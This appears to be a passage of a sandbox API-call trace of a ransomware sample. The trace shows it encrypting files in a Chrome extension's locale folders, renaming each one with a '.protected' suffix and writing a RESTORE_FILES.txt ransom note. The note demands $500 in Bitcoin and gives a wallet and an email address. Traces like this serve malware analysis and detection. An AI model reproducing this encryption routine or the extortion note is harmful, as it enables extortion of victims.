(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.983] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.983] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.983] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.983] CloseHandle (hObject=0x164) returned 1 [0078.983] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned 141 [0078.984] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0078.984] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*") returned 143 [0078.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.984] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.984] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\.") returned 143 [0078.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.984] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.984] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.984] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\..") returned 144 [0078.984] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.984] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.984] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.985] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.985] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.986] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.986] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.986] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.986] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.986] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.986] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.987] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.987] CloseHandle (hObject=0x168) returned 1 [0078.987] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.protected") returned 165 [0078.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.protected")) returned 1 [0078.987] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.987] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.988] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0078.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.988] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.988] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.989] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.989] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.989] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.989] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.989] CloseHandle (hObject=0x164) returned 1 [0078.989] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.989] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0078.989] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0078.989] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0078.989] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0078.989] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0078.989] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned 141 [0078.989] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0078.989] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0078.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*") returned 143 [0078.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.989] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.989] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.989] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.989] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.989] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\.") returned 143 [0078.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.989] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.990] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.990] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.990] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.990] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.990] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.990] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\..") returned 144 [0078.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.990] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.990] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.990] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.990] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.990] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.990] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.990] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.991] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.991] CloseHandle (hObject=0x168) returned 1 [0078.992] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.protected") returned 165 [0078.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.protected")) returned 1 [0078.992] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.992] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.992] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\RESTORE_FILES.txt") returned 159 [0078.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.993] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.993] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.993] lstrlenA (lpString="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") returned 684 [0078.993] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
